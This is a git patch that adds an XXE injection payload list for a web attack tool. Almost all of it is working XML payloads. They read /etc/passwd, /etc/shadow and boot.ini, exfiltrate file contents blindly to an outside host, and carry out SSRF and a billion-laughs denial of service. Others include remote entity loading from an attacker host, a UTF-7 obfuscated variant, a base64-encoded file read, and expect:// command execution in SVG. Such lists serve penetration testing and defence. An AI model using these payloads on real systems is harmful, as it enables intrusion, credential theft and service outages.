From 3f3b7feed22a3d79c4f33cb73a2fadebb7846433 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C4=B0smail=20Ta=C5=9Fdelen?=
 <ismailtasdelen@users.noreply.github.com>
Date: Sat, 23 Nov 2019 11:02:34 +0300
Subject: [PATCH] add intruder - xxe-injection-payload-list.txt

add intruder - xxe-injection-payload-list.txt
---
 Intruder/xxe-injection-payload-list.txt.txt | 127 ++++++++++++++++++++
 1 file changed, 127 insertions(+)
 create mode 100644 Intruder/xxe-injection-payload-list.txt.txt

diff --git a/Intruder/xxe-injection-payload-list.txt.txt b/Intruder/xxe-injection-payload-list.txt.txt
new file mode 100644
index 0000000..032ee07
--- /dev/null
+++ b/Intruder/xxe-injection-payload-list.txt.txt
@@ -0,0 +1,127 @@
+# XML External Entity (XXE) Injection Payloads
+
+* XXE : Classic XXE
+
+<?xml version="1.0"?>
+<!DOCTYPE data [
+<!ELEMENT data (#ANY)>
+<!ENTITY file SYSTEM "file:///etc/passwd">
+]>
+<data>&file;</data>
+
+<?xml version="1.0" encoding="ISO-8859-1"?>
+  <!DOCTYPE foo [  
+  <!ELEMENT foo ANY >
+  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
+
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [  
+  <!ELEMENT foo ANY >
+  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
+
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [  
+  <!ELEMENT foo ANY >
+  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> 
+
+* XXE: Basic XML Example
+
+<!--?xml version="1.0" ?-->
+<userInfo>
+ <firstName>John</firstName>
+ <lastName>Doe</lastName>
+</userInfo>
+
+*  XXE: Entity Example
+
+<!--?xml version="1.0" ?-->
+<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
+ <userInfo>
+  <firstName>John</firstName>
+  <lastName>&example;</lastName>
+ </userInfo>
+
+*  XXE: File Disclosure
+
+<!--?xml version="1.0" ?-->
+<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
+<userInfo>
+ <firstName>John</firstName>
+ <lastName>&ent;</lastName>
+</userInfo>
+
+* XXE: Denial-of-Service Example
+
+<!--?xml version="1.0" ?-->
+<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
+<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;
+<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
+<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
+<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
+<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
+<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
+<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
+<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
+<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
+<tag>&lol9;</tag>
+
+* XXE: Local File Inclusion Example
+
+<?xml version="1.0"?>
+<!DOCTYPE foo [  
+<!ELEMENT foo (#ANY)>
+<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
+
+* XXE: Blind Local File Inclusion Example (When first case doesn't return anything.)
+
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+<!ELEMENT foo (#ANY)>
+<!ENTITY % xxe SYSTEM "file:///etc/passwd">
+<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
+
+* XXE: Access Control Bypass (Loading Restricted Resources - PHP example)
+
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
+<foo><result>&ac;</result></foo>
+
+* XXE:SSRF ( Server Side Request Forgery ) Example
+
+<?xml version="1.0"?>
+<!DOCTYPE foo [  
+<!ELEMENT foo (#ANY)>
+<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>
+
+*  XXE: (Remote Attack - Through External Xml Inclusion) Exmaple
+
+<?xml version="1.0"?>
+<!DOCTYPE lolz [
+<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
+<lolz><lol>3..2..1...&test<lol></lolz>
+
+* XXE: UTF-7 Exmaple
+
+<?xml version="1.0" encoding="UTF-7"?>
++ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
++ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
++ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
+
+* XXE: Base64 Encoded
+
+<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
+
+* XXE: XXE inside SOAP Example
+
+<soap:Body>
+  <foo>
+    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
+  </foo>
+</soap:Body>
+
+* XXE: XXE inside SVG
+
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
+    <image xlink:href="expect://ls"></image>
+</svg>
\ No newline at end of file